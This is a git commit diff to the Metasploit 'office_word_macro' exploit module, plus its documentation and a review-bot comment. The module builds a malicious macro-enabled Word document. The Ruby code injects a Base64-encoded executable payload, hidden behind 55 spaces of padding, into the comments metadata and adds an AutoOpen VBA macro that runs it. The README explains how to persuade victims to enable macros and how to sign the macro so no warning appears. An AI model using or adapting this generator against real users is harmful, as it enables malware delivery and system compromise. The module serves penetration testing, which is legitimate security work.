Update office_word_macro exploit to support template injection

bug/bundler_fix
wchen-r7 2017-05-25 15:53:45 -05:00
parent e4ea618edf
commit ee13195760
19 changed files with 273 additions and 101 deletions


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>


@ -0,0 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description></dc:description>
<cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
<cp:category/>
</cp:coreProperties>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>

Binary file not shown.


@ -1,2 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData> <wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" 
xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

Binary file not shown.


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid 
w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>


@ -1,13 +1,16 @@
## Description ## Description
This module generates a macro-enabled Microsoft Office Word document. It does not target a specific This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a
CVE or vulnerability, this is more of a feature-abuse in Office, however this type of specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a
social-engineering attack still remains common today. popular type of social-engineering attack such as in ransomware.
There are many ways to create this type of malicious doc. The module injects the Base64-encoded By default, the module uses a built-in Office document (docx) as the template. It injects the
payload in the comments field, which will get decoded back by the macro and executed as a Windows Base64-encoded payload into the comments field, which will get decoded back by the macro and executed
executable when the Office document is launched. as a Windows executable when the Office document is launched.
If you do not wish to use the built-in docx template, you can also choose your own. Please see more
details below.
## Vulnerable Application ## Vulnerable Application
@ -22,58 +25,74 @@ Specifically, this module was tested specifically against:
* Microsoft Office 2016. * Microsoft Office 2016.
* Microsoft Office Word 15.29.1 (161215). * Microsoft Office Word 15.29.1 (161215).
## Building the Office Document Template
It is recommended that you build your Office document (docx) template from either one of these
applications:
* Google Docs
* Microsoft Office Word
**Google Docs**
Google Docs is ideal in case you don't have Microsoft Office available.
Before you start, make sure you have a Gmail account.
Next, to create a new document, please go to the following:
[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs)
To save the document as a docx on Google docs:
1. Click on File
2. Go to Download as
3. Click on Microsoft Word (.docx)
**Microsoft Office Word**
If you already have Microsoft Office, you can use it to create a docx file and use it as a template.
## Verification Steps ## Verification Steps
**To use the default template**
1. ```use exploit/multi/fileformat/office_word_macro``` 1. ```use exploit/multi/fileformat/office_word_macro```
2. ```set PAYLOAD [PAYLOAD NAME]``` 2. ```set PAYLOAD [PAYLOAD NAME]```
3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc) 3. Configure the rest of the settings accordingly (LHOST, LPORT, etc)
4. ```exploit``` 4. ```exploit```
5. The module should generate the malicious docm. 5. The module should generate the malicious docm.
**To use the custom template**
1. ```use exploit/multi/fileformat/office_word_macro```
2. ```set PAYLOAD [PAYLOAD NAME]```
3. ```set CUSTOMTEMPLATE [DOCX PATH]```
4. Configure the rest of the settings accordingly
5. ```exploit```
6. The module should generate the malicious docm.
## Options ## Options
**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more. **CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
## Demo
In this example, first we generate the malicious docm exploit, and then we set up a
windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
exploit to a Windows machine with Office 2013 installed, when the document runs the
macro, we get a session:
![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
## Modification
To use this exploit in a real environment, you will most likely need to modify the docm content.
Here's one approach you can do:
1. Use the module to generate the malicious docm
2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
When you open the document, the payload will probably do something on your machine. It's ok,
since you generated it, it should not cause any problems for you.
3. Save the doc, and test again to make sure the payload still works.
While editing, you should avoid modifying the following unless you are an advanced user:
* The comments field. If you have to modify this, make sure to create 55 empty spaces
in front of the payload string. The blank space is for making the payload less obvious
at first sight if the user views the file properties.
* The VB code in the macro.
## Trusted Document ## Trusted Document
By default, Microsoft Office does not execute macros automatically unless it is considered as a By default, Microsoft Office does not execute macros automatically unless it is considered as a
trusted document. This means that if a macro is present, the user will most likely need to manually trusted document. This means that if a macro is present, the user will most likely need to manually
click on the "Enable Content" button in order to run the macro. click on the "Enable Content" or "Enable Macro" button in order to run the macro.
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
the user into allowing the macro to run. For example, making the document look like something the user into allowing the macro to run. For example, making the document look like something
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory). written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
To truly make the macro document to run without any warnings, you must somehow figure out a way to To truly make the macro document run without any warnings, you must somehow figure out a way to
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts. sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
If money is not an issue, you can easily buy a certificate on-line:
[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html)
For testing purposes, another way to have a certificate is to create a self-signed one using For testing purposes, another way to have a certificate is to create a self-signed one using
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
Windows: Windows:


@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => "Microsoft Office Word Malicious Macro Execution", 'Name' => "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{ 'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments This module injects a malicious macro into a Microsoft Office Word document (docx). The
metadata in the data is injected with a Base64 encoded payload, which will be comments field in the metadata is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable. decoded by the macro and execute as a Windows executable.
For a successful attack, the victim is required to manually enable macro execution. For a successful attack, the victim is required to manually enable macro execution.
@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote
)) ))
register_options([ register_options([
OptString.new("BODY", [false, 'The message for the document body', OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']),
'Contents of this document are protected. Please click Enable Content to continue.' OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm'])
]),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
]) ])
end end
def get_file_in_docx(fname)
i = @docx.find_index { |item| item[:fname] == fname }
def on_file_read(short_fname, full_fname) unless i
buf = File.read(full_fname) fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(p)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end end
# The original filename of __rels is actually ".rels". @docx.fetch(i)[:data]
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end
yield short_fname, buf
end end
def add_content_type_extension(extension, content_type)
if has_content_type_extension?(extension)
update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type)
else
xml = get_file_in_docx('[Content_Types].xml')
types_node = xml.at('Types')
def package_docm(path) unless types_node
zip = Rex::Zip::Archive.new fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
end
Dir["#{path}/**/**"].each do |file| child_data = "<Default Extension=\"#{extension}\" ContentType=\"#{content_type}\"/>"
p = file.sub(path+'/','') types_node.add_child(child_data)
end
end
if File.directory?(file) def has_content_type_extension?(extension)
print_status("Packaging directory: #{file}") xml = get_file_in_docx('[Content_Types].xml')
zip.add_file(p) xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false
else end
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}") def add_content_type_partname(part_name, content_type)
zip.add_file(fname, buf) ctype_xml = get_file_in_docx('[Content_Types].xml')
types_node = ctype_xml.at('Types')
unless types_node
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
end
child_data = "<Override PartName=\"#{part_name}\" ContentType=\"#{content_type}\"/>"
types_node.add_child(child_data)
end
def update_content_type(pattern, attribute, new_value)
ctype_xml = get_file_in_docx('[Content_Types].xml')
doc_xml_ctype_node = ctype_xml.at(pattern)
if doc_xml_ctype_node
doc_xml_ctype_node.attributes[attribute].value = new_value
end
end
def add_rels_relationship(type, target)
rels_xml = get_file_in_docx('_rels/.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
end
last_index = get_last_relationship_index_from_rels
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
end
def add_doc_relationship(type, target)
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.')
end
last_index = get_last_relationship_index_from_doc_rels
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
end
def get_last_relationship_index_from_rels
rels_xml = get_file_in_docx('_rels/.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
end
relationships_node.search('Relationship').collect { |n|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
}.max
end
def get_last_relationship_index_from_doc_rels
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node')
end
relationships_node.search('Relationship').collect { |n|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
}.max
end
def inject_macro
add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject')
add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml')
pattern = 'Override[@PartName="/word/document.xml"]'
attribute_name = 'ContentType'
scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml'
update_content_type(pattern, attribute_name, scheme)
scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject'
fname = 'vbaProject.bin'
add_doc_relationship(scheme, fname)
@docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
@docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
@docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
end
def get_vbadata_xml
File.read(File.join(macro_resource_directory, 'vbaData.xml'))
end
def get_vbaproject_bin_rels
File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels'))
end
def get_vbaproject_bin
File.read(File.join(macro_resource_directory, 'vbaProject.bin'))
end
def get_core_xml
File.read(File.join(macro_resource_directory, 'core.xml'))
end
def create_core_xml_file
add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml')
add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml')
@docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) }
end
def inject_payload
p = padding = ' ' * 55
p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
begin
core_xml = get_file_in_docx('docProps/core.xml')
rescue Msf::Exploit::Failed
end
unless core_xml
print_status('Missing docProps/core.xml to inject the payload to. Using the default one.')
create_core_xml_file
core_xml = get_file_in_docx('docProps/core.xml')
end
description_node = core_xml.at('//cp:coreProperties//dc:description')
description_node.content = p
end
def unpack_docx(template_path)
doc = []
Zip::File.open(template_path) do |entries|
entries.each do |entry|
if entry.name.match(/\.xml|\.rels$/i)
content = Nokogiri::XML(entry.get_input_stream.read)
else
content = entry.get_input_stream.read
end end
vprint_status("Parsing item from template: #{entry.name}")
doc << { fname: entry.name, data: content }
end end
end end
zip.pack doc
end end
def pack_docm
@docx.each do |entry|
if entry[:data].kind_of?(Nokogiri::XML::Document)
entry[:data] = entry[:data].to_s
end
end
Msf::Util::EXE.to_zip(@docx)
end
def macro_resource_directory
@macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
end
def get_template_path
if datastore['CUSTOMTEMPLATE']
datastore['CUSTOMTEMPLATE']
else
File.join(macro_resource_directory, 'template.docx')
end
end
def exploit def exploit
print_status('Generating our docm file...') template_path = get_template_path
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro') print_status("Using template: #{template_path}")
docm = package_docm(path) @docx = unpack_docx(template_path)
print_status('Injecting payload in document comments')
inject_payload
print_status('Injecting macro and other required files in document')
inject_macro
print_status("Finalizing docm: #{datastore['FILENAME']}")
docm = pack_docm
file_create(docm) file_create(docm)
super super
end end
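Review bot: `inject_payload` assigns `description_node.content = p` without checking that `core_xml.at('//cp:coreProperties//dc:description')` found a node, so a CUSTOMTEMPLATE whose docProps/core.xml exists but carries no `dc:description` element (only a wholly missing core.xml is handled, via the rescue above it) raises NoMethodError instead of a clean module failure; add `fail_with(Failure::NotFound, 'docProps/core.xml is missing the dc:description node') unless description_node` before the assignment. The same unchecked nil appears in `get_last_relationship_index_from_rels` and `get_last_relationship_index_from_doc_rels`, where `.max` returns nil for a Relationships node with no Relationship children and `last_index+1` in `add_rels_relationship`/`add_doc_relationship` then fails; `}.max || 0` covers it. Separately, `p = padding = ' ' * 55` leaves `padding` unused while aliasing the very string that `<<` mutates on the next line, so `p = ' ' * 55` says the same thing more honestly. The enclosing class MetasploitModule starts before this hunk and presumably closes after it.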